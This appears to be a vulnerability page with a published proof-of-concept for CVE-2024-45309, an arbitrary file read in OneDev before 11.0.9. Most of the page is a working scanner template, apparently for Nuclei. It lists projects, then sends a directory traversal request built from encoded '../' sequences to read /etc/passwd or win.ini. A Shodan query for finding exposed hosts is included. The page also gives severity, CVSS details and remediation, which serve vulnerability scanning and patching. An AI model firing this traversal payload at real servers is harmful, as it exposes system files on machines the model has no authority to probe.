漏洞描述
Files on the host computer can be accessed by directory traversal.
CVE-2024-45309: OneDev.io < 11.0.9 - Arbitrary File Read
PoC代码[已公开]
id: CVE-2024-45309
info:
name: OneDev.io < 11.0.9 - Arbitrary File Read
author: isacaya
severity: high
description: |
Files on the host computer can be accessed by directory traversal.
impact: |
An attacker would be able to view the contents of a file on the computer.
remediation: |
Update to version 11.0.9.
reference:
- https://x.com/Siebene7/status/1848727539046617324
- https://github.com/theonedev/onedev/security/advisories/GHSA-7wg5-6864-v489
- https://nvd.nist.gov/vuln/detail/CVE-2024-45309
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-45309
cwe-id: CWE-22
epss-score: 0.81849
epss-percentile: 0.99158
cpe: cpe:2.3:a:onedev_project:onedev:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: onedev
shodan-query: html:"onedev.io"
product: onedev
framework: java
tags: cve,cve2024,lfi,onedev
flow: |
http(1)
for (let projectName of iterate(template.project)) {
set("project", projectName)
http(2)
}
http:
- raw:
- |
GET /~projects HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "onedev")'
internal: true
extractors:
- type: regex
part: body
name: project
group: 3
regex:
- '<a class="mr-([0-9]+)" id="([a-z0-9]+)" href="(.*)">'
internal: true
- raw:
- |
GET {{project}}/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{{path}} HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- /etc/passwd
- /windows/win.ini
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- 'root:.*:0:0:'
- '\\[(font|extension|file)s\\]'
condition: or
- type: word
part: header
words:
- 'filename='
- 'application/octet-stream'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100e2b2d7cf65ec58e6b0b0665bccb8dd66ba815b9bdd7bf8e41290808925bdaa4f02206d3c2b9f268e860e32eb7d9cb52a4c26361c1857db053f057e1d3d36f26d8ec7:922c64590222798bb761d5b6d8e72950